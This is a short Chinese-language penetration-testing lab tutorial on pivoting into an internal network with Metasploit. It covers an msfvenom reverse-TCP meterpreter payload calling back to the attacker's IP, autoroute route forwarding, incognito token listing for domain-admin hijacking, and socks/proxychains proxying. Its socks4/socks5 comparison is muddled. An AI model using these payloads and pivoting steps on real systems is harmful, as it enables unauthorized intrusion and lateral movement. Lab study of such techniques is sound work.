实验环境:
攻击机:kali 192.168.144.217
靶 机:
外网机: 外网网卡:192.168.144.147 内网网卡:192.168.52.143
域控:192.168.52.138
内网机win7:192.168.52.99
Metasploit内网代理
在已获得外网机shell的情况下,上传msf马反弹会话
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.144.217 lport=9999 -f exe >msff.exe
路由转发
普通转发
使用模块
可以使用post/multi/manage/autoroute模块进行路由转发socks+proxychains
使用路由转发,只能代理metasploit的流量,即只能使用metasloit的命令。若要设置攻击机全局代理,使用kali所有的工具,可以使用socks+proxychains的方式。proxychains负责指定哪些命令通过指定的端口发出,socks负责监听该端口,使得该端口流量中去往内网网段的流量走设定路由。
查看公网靶机存在的其他网段:
获取目标内网相关信息
run get_local_subnets
–>获取被攻击目标内网地址网段
run autoroute -s 192.168.1.0/24
–>扫描有效网卡的整个C段的信息
run autoroute -p
–>查看域环境
use incognito
–>调用劫持域管理模块
list_tokens -u
添加去往目标网段的转发路由
run autoroute –s <目标内网地址网段>
查看路由添加情况
run autoroute -p
socks4与socks5的异同:socks4和socks5都基于sock5协议。socks4代理只支持TCP应用,而socks5支持TCP、UDP两种应用,以及身份验证机制、服务器端域名解析等。